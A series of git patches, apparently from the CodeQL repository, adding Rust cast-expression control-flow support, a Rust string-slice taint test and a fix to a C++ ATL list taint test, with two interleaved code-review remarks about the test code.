= count(int i | exists(this.getAttr(i))) } + + /** + * Gets the expression of this cast expression, if it exists. + */ + ExprCfgNode getExpr() { + any(ChildMapping mapping).hasCfgChild(node, node.getExpr(), this, result) + } + + /** + * Holds if `getExpr()` exists. + */ + predicate hasExpr() { exists(this.getExpr()) } + + /** + * Gets the type representation of this cast expression, if it exists. + */ + TypeRepr getTypeRepr() { result = node.getTypeRepr() } + + /** + * Holds if `getTypeRepr()` exists. + */ + predicate hasTypeRepr() { exists(this.getTypeRepr()) } + } + final private class ParentConstBlockPat extends ParentAstNode, ConstBlockPat { override predicate relevantChild(AstNode child) { none() 
@@ -3305,6 +3365,18 @@ module MakeCfgNodes Input> { cfgNode ) or + pred = "getExpr" and + parent = + any(Nodes::CastExprCfgNode cfgNode, CastExpr astNode | + astNode = cfgNode.getCastExpr() and + child = getDesugared(astNode.getExpr()) and + i = -1 and + hasCfgNode(child) and + not child = cfgNode.getExpr().getAstNode() + | + cfgNode + ) + or pred = "getBlockExpr" and parent = any(Nodes::ConstBlockPatCfgNode cfgNode, ConstBlockPat astNode | diff --git a/rust/ql/lib/codeql/rust/elements/CastExpr.qll b/rust/ql/lib/codeql/rust/elements/CastExpr.qll index f7a892e7399..968a6062a15 100644 --- a/rust/ql/lib/codeql/rust/elements/CastExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/CastExpr.qll @@ -9,7 +9,7 @@ import codeql.rust.elements.Expr import codeql.rust.elements.TypeRepr /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll index d44836596fb..b074e737931 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll @@ -13,7 +13,7 @@ private import codeql.rust.elements.internal.generated.CastExpr module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll index dda6547fabb..a3725ff1a45 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll 
@@ -17,7 +17,7 @@ import codeql.rust.elements.TypeRepr */ module Generated { /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 03d9f253a60..17b3344b091 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -1387,7 +1387,7 @@ module Raw { /** * INTERNAL: Do not use. - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/test/extractor-tests/generated/.generated_tests.list b/rust/ql/test/extractor-tests/generated/.generated_tests.list index b39bf6b63ee..2410d9237d0 100644 --- a/rust/ql/test/extractor-tests/generated/.generated_tests.list +++ b/rust/ql/test/extractor-tests/generated/.generated_tests.list 
@@ -13,7 +13,7 @@ BlockExpr/gen_block_expr.rs 17b06c726e304e0efcfde8e71afd9c657860312be55436689423 BoxPat/gen_box_pat.rs 1493e24b732370b577ade38c47db17fa157df19f5390606a67a6040e49b501c0 1493e24b732370b577ade38c47db17fa157df19f5390606a67a6040e49b501c0 BreakExpr/gen_break_expr.rs aacdf9df7fc51d19742b9e813835c0bd0913017e8d62765960e06b27d58b9031 aacdf9df7fc51d19742b9e813835c0bd0913017e8d62765960e06b27d58b9031 CallExpr/gen_call_expr.rs 013a7c878996aefb25b94b68eebc4f0b1bb74ccd09e91c491980817a383e2401 013a7c878996aefb25b94b68eebc4f0b1bb74ccd09e91c491980817a383e2401 -CastExpr/gen_cast_expr.rs abd59cc7b92578b56098ac0045cf7de4b15c645cce79e3bdad8d3b6f4657360d abd59cc7b92578b56098ac0045cf7de4b15c645cce79e3bdad8d3b6f4657360d +CastExpr/gen_cast_expr.rs c3892211fbae4fed7cb1f25ff1679fd79d2878bf0bf2bd4b7982af23d00129f5 c3892211fbae4fed7cb1f25ff1679fd79d2878bf0bf2bd4b7982af23d00129f5 ClosureBinder/gen_closure_binder.rs 78d3219bdfc58a22f333e3c82468fc23001e92b1d5acb085de7f48d7d1722244 78d3219bdfc58a22f333e3c82468fc23001e92b1d5acb085de7f48d7d1722244 ClosureExpr/gen_closure_expr.rs 15bd9abdb8aaffabb8bb335f8ebd0571eb5f29115e1dc8d11837aa988702cd80 15bd9abdb8aaffabb8bb335f8ebd0571eb5f29115e1dc8d11837aa988702cd80 Comment/gen_comment.rs 1e1f9f43161a79c096c2056e8b7f5346385ab7addcdec68c2d53b383dd3debe6 1e1f9f43161a79c096c2056e8b7f5346385ab7addcdec68c2d53b383dd3debe6 diff --git a/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs b/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs index 2945c711320..ba0ed150d0b 100644 --- a/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs +++ b/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs @@ -1,6 +1,6 @@ // generated by codegen, do not edit fn test_cast_expr() -> () { - // A cast expression. For example: + // A type cast expression. For example: value as u64; } diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index 9ee94e99c25..025b0f566ba 100644 
--- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -448,10 +448,10 @@ class _: """ -@annotate(CastExpr) +@annotate(CastExpr, cfg = True) class _: """ - A cast expression. For example: + A type cast expression. For example: ```rust value as u64; ``` From 70a296be895df6c1e80c8fa2320cfcd4ba11c981 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 13:24:15 +0100 Subject: [PATCH 0793/1267] Rust: Add string slice taint flow test --- .../dataflow/taint/TaintFlowStep.expected | 0 .../dataflow/taint/TaintFlowStep.ql | 4 ++++ .../test/library-tests/dataflow/taint/main.rs | 19 +++++++++++++++++++ 3 files changed, 23 insertions(+) create mode 100644 rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected create mode 100644 rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql new file mode 100644 index 00000000000..5eebf4b347d --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql @@ -0,0 +1,4 @@ +import codeql.rust.dataflow.DataFlow +import codeql.rust.dataflow.internal.TaintTrackingImpl + +query predicate additionalTaintStep = RustTaintTracking::defaultAdditionalTaintStep/3; diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index d3b19f3bc52..9029b883dc7 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs 
@@ -24,8 +24,27 @@ fn cast() { sink(b as i64); // $ MISSING: hasTaintFlow=77 } +mod string { + fn source(i: i64) -> String { + format!("{}", i) + } + + fn sink(s: &str) { + println!("{}", s); + } + + pub fn string_slice() { + let s = source(35); + let sliced = &s[1..3]; + sink(sliced); // $ MISSING: hasTaintFlow=35 + } +} + +use string::*; + fn main() { addition(); negation(); cast(); + string_slice(); } From 8d035e61a3b744d9a878c18661e2f14e685b780f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:33:02 +0000 Subject: [PATCH 0794/1267] C++: Fix test. --- .../dataflow/taint-tests/atl.cpp | 32 +++--- .../dataflow/taint-tests/localTaint.expected | 102 +++++++++--------- .../taint-tests/test_mad-signatures.expected | 17 +++ 3 files changed, 84 insertions(+), 67 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index a6638ad3f56..05d14c06c36 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
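Review bot: In `string_slice`, the nested `source(35)` returns `format!("{}", 35)`, a two-byte string, so `&s[1..3]` is out of bounds and panics if this program is ever run, and `main` now calls `string_slice()`. The extractor only needs the code to compile, but keeping the test runnable avoids surprises if it is ever executed; a range inside the string such as `let sliced = &s[0..1];` keeps the same slice expression under test. The `hasTaintFlow=35` annotation is unaffected by the range.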
@@ -347,52 +347,52 @@ void test_CAtlList() { int* p = indirect_source(); { - CAtlList list(10); + CAtlList list(10); sink(list.GetHead()); - list.AddHead(x); + list.AddHead(p); sink(list.GetHead()); // $ ir - CAtlList list2(10); + CAtlList list2(10); list2.AddHeadList(&list); sink(list2.GetHead()); // $ ir - CAtlList list3(10); - list3.AddTail(x); + CAtlList list3(10); + list3.AddTail(p); sink(list3.GetHead()); // $ ir - CAtlList list4(10); + CAtlList list4(10); list4.AddTailList(&list3); sink(list4.GetHead()); // $ ir { - CAtlList list5(10); - auto pos = list5.Find(x, list5.GetHeadPosition()); + CAtlList list5(10); + auto pos = list5.Find(p, list5.GetHeadPosition()); sink(list5.GetAt(pos)); // $ MISSING: ir } { - CAtlList list6(10); - list6.AddHead(x); + CAtlList list6(10); + list6.AddHead(p); auto pos = list6.FindIndex(0); sink(list6.GetAt(pos)); // $ ir } { - CAtlList list7(10); + CAtlList list7(10); auto pos = list7.GetTailPosition(); - list7.InsertAfter(pos, x); + list7.InsertAfter(pos, p); sink(list7.GetHead()); // $ ir } { - CAtlList list8(10); + CAtlList list8(10); auto pos = list8.GetTailPosition(); - list8.InsertBefore(pos, x); + list8.InsertBefore(pos, p); sink(list8.GetHead()); // $ ir } { - CAtlList list9(10); - list9.SetAt(list9.GetHeadPosition(), x); + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), p); sink(list9.GetHead()); // $ ir } } diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 41c3822aed5..a35e1c53d1c 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
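Review bot: In the `list5` block, `p` is only passed to `list5.Find(p, list5.GetHeadPosition())` and is never added to the list, yet `sink(list5.GetAt(pos)); // $ MISSING: ir` still records a flow as expected. As far as the hunk shows, that flow could only arrive through the POSITION value returned by `Find`, which is probably not something the model should propagate. Either drop the `MISSING: ir` annotation on that line or insert `list5.AddHead(p);` before the `Find` call, so the expected flow goes through the element like the `list6` case does. `test_CAtlList` starts above this hunk, so earlier statements are not visible here.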
@@ -299,13 +299,6 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:296:11:296:21 | call to source | atl.cpp:331:30:331:30 | x | | | atl.cpp:296:11:296:21 | call to source | atl.cpp:338:31:338:31 | x | | | atl.cpp:296:11:296:21 | call to source | atl.cpp:343:44:343:44 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:352:18:352:18 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:360:19:360:19 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:369:29:369:29 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:375:21:375:21 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:383:30:383:30 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:390:31:390:31 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:395:44:395:44 | x | | | atl.cpp:298:24:298:25 | 10 | atl.cpp:298:24:298:26 | call to CAtlList | TAINT | | atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:299:10:299:13 | list | | | atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:300:5:300:8 | list | | 
@@ -406,12 +399,19 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | | atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | | atl.cpp:344:12:344:16 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | -| atl.cpp:350:24:350:25 | 10 | atl.cpp:350:24:350:26 | call to CAtlList | TAINT | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:351:10:351:13 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:352:5:352:8 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:353:10:353:13 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:356:24:356:27 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:398:3:398:3 | list | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:352:18:352:18 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:360:19:360:19 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:369:29:369:29 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:375:21:375:21 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:383:30:383:30 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:390:31:390:31 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:395:44:395:44 | p | | +| atl.cpp:350:25:350:26 | 10 | atl.cpp:350:25:350:27 | call to CAtlList | TAINT | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:351:10:351:13 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:352:5:352:8 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:353:10:353:13 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:356:24:356:27 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:398:3:398:3 | list | | | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:352:5:352:8 | list | | | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:353:10:353:13 | list | 
| | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:356:24:356:27 | list | | 
@@ -421,37 +421,37 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:352:5:352:8 | ref arg list | atl.cpp:398:3:398:3 | list | | | atl.cpp:353:10:353:13 | ref arg list | atl.cpp:356:24:356:27 | list | | | atl.cpp:353:10:353:13 | ref arg list | atl.cpp:398:3:398:3 | list | | -| atl.cpp:355:25:355:26 | 10 | atl.cpp:355:25:355:27 | call to CAtlList | TAINT | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | -| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:355:26:355:27 | 10 | atl.cpp:355:26:355:28 | call to CAtlList | TAINT | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:355:26:355:28 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | | atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:357:10:357:14 | list2 | | | atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | | atl.cpp:356:24:356:27 | list | atl.cpp:356:23:356:27 | & ... 
| | | atl.cpp:357:10:357:14 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | -| atl.cpp:359:25:359:26 | 10 | atl.cpp:359:25:359:27 | call to CAtlList | TAINT | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | -| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:359:26:359:27 | 10 | atl.cpp:359:26:359:28 | call to CAtlList | TAINT | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:359:26:359:28 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:361:10:361:14 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | | atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | | atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | | atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | -| atl.cpp:363:25:363:26 | 10 | atl.cpp:363:25:363:27 | call to CAtlList | TAINT | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | -| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:363:26:363:27 | 10 | atl.cpp:363:26:363:28 | call to CAtlList | TAINT | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:363:26:363:28 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | | atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:365:10:365:14 | list4 | | | atl.cpp:364:5:364:9 | ref arg list4 | 
atl.cpp:398:3:398:3 | list4 | | | atl.cpp:364:24:364:28 | list3 | atl.cpp:364:23:364:28 | & ... | | | atl.cpp:365:10:365:14 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | -| atl.cpp:368:27:368:28 | 10 | atl.cpp:368:27:368:29 | call to CAtlList | TAINT | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | -| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:368:28:368:29 | 10 | atl.cpp:368:28:368:30 | call to CAtlList | TAINT | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:368:28:368:30 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | | atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:369:24:369:27 | call to Find | atl.cpp:370:24:370:26 | pos | | 
@@ -459,11 +459,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | | atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | | atl.cpp:370:12:370:16 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | -| atl.cpp:374:27:374:28 | 10 | atl.cpp:374:27:374:29 | call to CAtlList | TAINT | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | -| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:374:28:374:29 | 10 | atl.cpp:374:28:374:30 | call to CAtlList | TAINT | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:374:28:374:30 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:376:18:376:22 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | | atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | 
@@ -471,11 +471,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | | atl.cpp:376:24:376:32 | call to FindIndex | atl.cpp:377:24:377:26 | pos | | | atl.cpp:377:12:377:16 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | -| atl.cpp:381:27:381:28 | 10 | atl.cpp:381:27:381:29 | call to CAtlList | TAINT | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | -| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:381:28:381:29 | 10 | atl.cpp:381:28:381:30 | call to CAtlList | TAINT | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:381:28:381:30 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:383:7:383:11 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | | atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | 
@@ -483,11 +483,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | | atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | | atl.cpp:384:12:384:16 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | -| atl.cpp:388:27:388:28 | 10 | atl.cpp:388:27:388:29 | call to CAtlList | TAINT | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | -| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:388:28:388:29 | 10 | atl.cpp:388:28:388:30 | call to CAtlList | TAINT | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:388:28:388:30 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:390:7:390:11 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | | atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | 
@@ -495,11 +495,11 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | | atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | | atl.cpp:391:12:391:16 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | -| atl.cpp:394:27:394:28 | 10 | atl.cpp:394:27:394:29 | call to CAtlList | TAINT | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | -| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:394:28:394:29 | 10 | atl.cpp:394:28:394:30 | call to CAtlList | TAINT | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:394:28:394:30 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | | atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | | atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | | atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:395:7:395:11 | list9 | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 7e8a52fdb35..9284dc759eb 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected 
@@ -3,6 +3,8 @@ signatureMatches | atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:70:3:70:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | | atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | 
@@ -543,19 +545,34 @@ getParameterTypeName | atl.cpp:209:8:209:16 | SetAtGrow | 1 | INARGTYPclass:0 | | atl.cpp:211:6:211:15 | operator[] | 0 | size_t | | atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:257:3:257:10 | CAtlList | 0 | UINT | +| atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:260:12:260:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:261:8:261:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:263:12:263:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:264:8:264:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:265:12:265:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:265:12:265:15 | Find | 1 | POSITION | +| atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | | atl.cpp:266:12:266:20 | FindIndex | 0 | size_t | | atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:267:6:267:10 | GetAt | 0 | POSITION | +| atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | | atl.cpp:280:12:280:22 | InsertAfter | 0 | POSITION | | atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:280:12:280:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | | atl.cpp:281:12:281:23 | InsertBefore | 0 | POSITION | | atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:281:12:281:23 | InsertBefore | 1 | INARGTYPclass:0 | | atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 0 | POSITION | +| atl.cpp:291:8:291:12 | SetAt | 1 | INARGTYPclass:0 